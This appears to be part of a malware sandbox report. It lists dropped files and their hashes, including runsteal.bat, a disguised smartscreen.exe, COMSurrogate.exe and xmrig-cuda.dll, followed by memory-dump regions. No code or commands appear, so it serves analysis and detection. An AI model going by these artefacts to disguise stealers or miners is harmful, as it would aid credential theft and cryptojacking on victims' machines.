240c74f7f3bbe07352596db3c9826c7d32c6c2bcabcd342ceb0352df6c631f02

SHA512
fc1b5f5b07e75bc02f67512d27affc82eb3e51b6383c723ea46338cd8b04fe4e72d3ad4efc6eebdc57c50b030952c07cd80ab3e89c8f9a211ca38d7dad2997a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOG.old

Filesize
361B

MD5
8fb82999aa6cbd4a917e482ceac3e681

SHA1
91fd2bda48480fbca031dbc13d4d3fef9950b81e

SHA256
79928e3a7bd43b83916fb436f044f00e0018eae1de1bd2574b63175af47d643e

SHA512
eb90e67dcbe5e164eab661ee5f17c33402c548696ceb5d24ac0c5d67bbdf13b09a9e81764721df95e6500aca44e1bc85e0cb05912cafcac272ad7abea8c497dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ArchiveContents\Chrome\ghbmnnjooekpmoecnnnilnnbdlolhkhi\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Temp\N_Admin_181.215.176.83.zip

Filesize
1KB

MD5
32393c99b78ca955c8dad9baf2da609b

SHA1
aa624b7e1bf54b88f6c5c5c258b7f6a67cc48301

SHA256
fb4f78a3f93924e6b51b6abb46fc60c402db205231ce34e66f8052d15da03792

SHA512
ea6fdea48f206bc2375e7348e89665ec43c9807f54a6fa24811c62372e298eb3fea3cbff72a58ec6d4c264fbb5b3c1a079fb9f4e2069b0fae09d4cca8a9a6005

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34a1bbls.ynl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\download.bat

Filesize
819B

MD5
f2a75175c8082ccd3e1713b00556a6e2

SHA1
2f5dc37978320bc1ca207c0c0aff1240aad6c7cf

SHA256
019157c15709f7d6301cb0fb15f45c054230ea91f06ff817b426d7f6ccb14686

SHA512
011ab44e81d61636d5b1637584faf0701a5b2226289b6200cd89ad97927f52f1c659df626afc2b46edd656960d67934fff97f5e10fd6a7454027d430feafa7a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\downloaded_script.bat

Filesize
6KB

MD5
6e3686fbda5d6de04cbb6a96de1619e6

SHA1
3d45b2cd2eb875a70c5478fe01ab5c892f4b2373

SHA256
f3d0087ff367459be58237633e454401ddafd90a9ecaa8986ab5ab058091df09

SHA512
118d22cf433ad3c19ebff9400d09140a25a9bc2c36fdd6de231c2f2398e53ebc043de5355c071a63d7dc5917a39061ea71e60c314838e25e8f5a8f5f3f9225b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\runsteal.bat

Filesize
399B

MD5
744f8978db36b4b9db7cb6e5c8c41e08

SHA1
84321921f622d20a4d40c9bef43b7744e74aaee7

SHA256
cedfe277f8c600679365ce2c54a9c303907a0acadc23ed6e6968746d2e8ca468

SHA512
d1584b2134bf3960af33a514b3a9fba69c7eb2fbbc3b0cffe7e493f182b20547f7596012fcc5e6b5ffbefee5a0b7d1afe45eee822cff5b0720ffd6292af2394f

Download Submit
C:\Users\Admin\AppData\Local\Temp\smartscreen.exe

Filesize
164KB

MD5
1fed66d1f6b85bda20fe0403ca01c9bd

SHA1
6a3056191a7d8da167285b2bf5f9fa671022c8c1

SHA256
924ee12f6a98aeeb1c7836ec8984f0f93216bfff0433bcd4ee643d33d96db74a

SHA512
0fb1397078689a52d1c77cc239b1e42afa5ff87a3f5b4f825705e9bda1bd2c58bfb50a6067ea0a202fa7edb0a890cbac9314413fc8757c8b75a43fa0b12ef613

Download Submit
C:\Users\Admin\AppData\Local\asm\COMSurrogate.exe

Filesize
164KB

MD5
77334f046a50530cdc6e585e59165264

SHA1
657a584eafe86df36e719526d445b570e135d217

SHA256
eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08

SHA512
97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

Download Submit
C:\Users\Admin\AppData\Local\asm\config.json

Filesize
2KB

MD5
dcb095940d9fb21102941fbeb7bbe9f7

SHA1
3c0d33b914bc5b174cd9c13427ec8700c09d96ca

SHA256
ba88bbb257474d6d7e8e9bec7a12ff826c3fa80cb019fbc92ea8d6253c2400b1

SHA512
c384a68fac9c301efd695605e6b14e1e201be687d99cc1e31c6ed2c3d17f37c28802179dd175b4aadb29a3dd6d808b203e18ee96db63a5dbcb92c9d42d2036c2

Download Submit
C:\Users\Admin\AppData\Local\asm\mi.exe

Filesize
6.1MB

MD5
f6d520ae125f03056c4646c508218d16

SHA1
f65e63d14dd57eadb262deaa2b1a8a965a2a962c

SHA256
d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1

SHA512
d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d

Download Submit
C:\Users\Admin\AppData\Local\asm\xmrig-cuda.dll

Filesize
31.4MB

MD5
0eaba7ef81b53a938d96921fb2185c19

SHA1
9154ad5f8d24426e2ba63212461ae48db8dd9085

SHA256
9d3aa03f8a003a0142ca6bca93d8b86bc6785b5076d1d2a6528602c110d5e4eb

SHA512
0ab9caae19b9c97958b8d9084585bd4ef2857e9a6956d4cf87f57e1b25d873f911b05da3532acf15d9956286ab0b0e1606f9ea5e3f84b25f495506b0fab02569

Download Submit
memory/1472-125-0x000001FA913E0000-0x000001FA9140E000-memory.dmp

Filesize
184KB

Download
memory/2196-218-0x0000000007ED0000-0x0000000007EDA000-memory.dmp

Filesize
40KB

Download
memory/2196-207-0x0000000070610000-0x000000007065C000-memory.dmp

Filesize
304KB

Download
memory/2196-217-0x0000000007F70000-0x0000000007F82000-memory.dmp

Filesize
72KB

Download
memory/2844-55-0x0000000009B20000-0x0000000009B3A000-memory.dmp

Filesize
104KB

Download
memory/2844-84-0x0000000009B10000-0x000000000A128000-memory.dmp

Filesize
6.1MB

Download
memory/2844-35-0x0000000008520000-0x000000000856C000-memory.dmp

Filesize
304KB

Download
memory/2844-38-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2844-48-0x0000000009680000-0x000000000969E000-memory.dmp

Filesize
120KB

Download
memory/2844-49-0x00000000096A0000-0x0000000009743000-memory.dmp

Filesize
652KB

Download
memory/2844-50-0x00000000097D0000-0x00000000097DA000-memory.dmp

Filesize
40KB

Download
memory/2844-51-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2844-52-0x0000000009A80000-0x0000000009A91000-memory.dmp

Filesize
68KB

Download
memory/2844-53-0x0000000009AD0000-0x0000000009ADE000-memory.dmp

Filesize
56KB

Download
memory/2844-54-0x0000000009AE0000-0x0000000009AF4000-memory.dmp

Filesize
80KB

Download
memory/2844-33-0x0000000007420000-0x0000000007486000-memory.dmp

Filesize
408KB

Download
memory/2844-56-0x0000000009B40000-0x0000000009B48000-memory.dmp

Filesize
32KB

Download
memory/2844-32-0x0000000007BC0000-0x0000000007F14000-memory.dmp

Filesize
3.3MB

Download
memory/2844-31-0x0000000007100000-0x000000000714A000-memory.dmp

Filesize
296KB

Download
memory/2844-30-0x0000000007020000-0x000000000703E000-memory.dmp

Filesize
120KB

Download
memory/2844-29-0x0000000007090000-0x00000000070F6000-memory.dmp

Filesize
408KB

Download
memory/2844-28-0x0000000006F20000-0x0000000006F42000-memory.dmp

Filesize
136KB

Download
memory/2844-0-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

Filesize
4KB

Download
memory/2844-27-0x0000000006F80000-0x0000000007016000-memory.dmp

Filesize
600KB

Download
memory/2844-82-0x0000000074CAE000-0x0000000074CAF000-memory.dmp

Filesize
4KB

Download
memory/2844-26-0x0000000007540000-0x0000000007BBA000-memory.dmp

Filesize
6.5MB

Download
memory/2844-85-0x00000000086D0000-0x00000000086E2000-memory.dmp

Filesize
72KB

Download
memory/2844-34-0x00000000074C0000-0x00000000074E2000-memory.dmp

Filesize
136KB

Download
memory/2844-86-0x0000000008730000-0x000000000876C000-memory.dmp

Filesize
240KB

Download
memory/2844-24-0x0000000006CA0000-0x0000000006CBA000-memory.dmp

Filesize
104KB

Download
memory/2844-25-0x0000000006D00000-0x0000000006D36000-memory.dmp

Filesize
216KB

Download
memory/2844-89-0x00000000088A0000-0x00000000089AA000-memory.dmp

Filesize
1.0MB

Download
memory/2844-90-0x0000000008B80000-0x0000000008D42000-memory.dmp

Filesize
1.8MB

Download
memory/2844-91-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2844-14-0x0000000006510000-0x0000000006B38000-memory.dmp

Filesize
6.2MB

Download
memory/2844-97-0x0000000008B30000-0x0000000008B3A000-memory.dmp

Filesize
40KB

Download
memory/2844-13-0x0000000005ED0000-0x0000000005EE0000-memory.dmp

Filesize
64KB

Download
memory/2844-12-0x00000000057A0000-0x00000000057B8000-memory.dmp

Filesize
96KB

Download
memory/2844-11-0x0000000005780000-0x0000000005788000-memory.dmp

Filesize
32KB

Download
memory/2844-10-0x0000000005770000-0x000000000577A000-memory.dmp

Filesize
40KB

Download
memory/2844-9-0x0000000005760000-0x0000000005768000-memory.dmp

Filesize
32KB

Download
memory/2844-8-0x00000000052A0000-0x00000000052A8000-memory.dmp

Filesize
32KB

Download
memory/2844-7-0x0000000005150000-0x0000000005162000-memory.dmp

Filesize
72KB

Download
memory/2844-6-0x00000000052C0000-0x0000000005352000-memory.dmp

Filesize
584KB

Download
memory/2844-5-0x00000000057D0000-0x0000000005D74000-memory.dmp

Filesize
5.6MB

Download
memory/2844-148-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2844-4-0x0000000004F20000-0x0000000004F7C000-memory.dmp

Filesize
368KB

Download
memory/2844-3-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2844-161-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2844-2-0x00000000028D0000-0x00000000028DE000-memory.dmp

Filesize
56KB

Download
memory/2844-1-0x0000000000120000-0x0000000000526000-memory.dmp

Filesize
4.0MB

Download
memory/2980-81-0x0000000006E70000-0x0000000006F13000-memory.dmp

Filesize
652KB

Download
memory/2980-69-0x0000000070610000-0x000000007065C000-memory.dmp

Filesize
304KB

Download
memory/2980-57-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2980-58-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2980-68-0x0000000006C30000-0x0000000006C62000-memory.dmp

Filesize
200KB

Download
memory/2980-79-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2980-95-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2980-88-0x00000000071E0000-0x00000000071F4000-memory.dmp

Filesize
80KB

Download
memory/2980-87-0x00000000071A0000-0x00000000071B1000-memory.dmp

Filesize
68KB

Download
memory/2980-83-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/2980-80-0x0000000074CA0000-0x0000000075450000-memory.dmp

Filesize
7.7MB

Download
memory/3172-238-0x000001A5512A0000-0x000001A5512C0000-memory.dmp

Filesize
128KB

Download
memory/3196-195-0x000001DA78A00000-0x000001DA78A2E000-memory.dmp

Filesize
184KB

Download
memory/4628-136-0x0000000070610000-0x000000007065C000-memory.dmp

Filesize
304KB

Download
memory/4628-146-0x00000000070F0000-0x0000000007193000-memory.dmp

Filesize
652KB

Download
memory/4628-149-0x00000000073C0000-0x00000000073D4000-memory.dmp

Filesize
80KB

Download
memory/4628-147-0x0000000007380000-0x0000000007391000-memory.dmp

Filesize
68KB

Download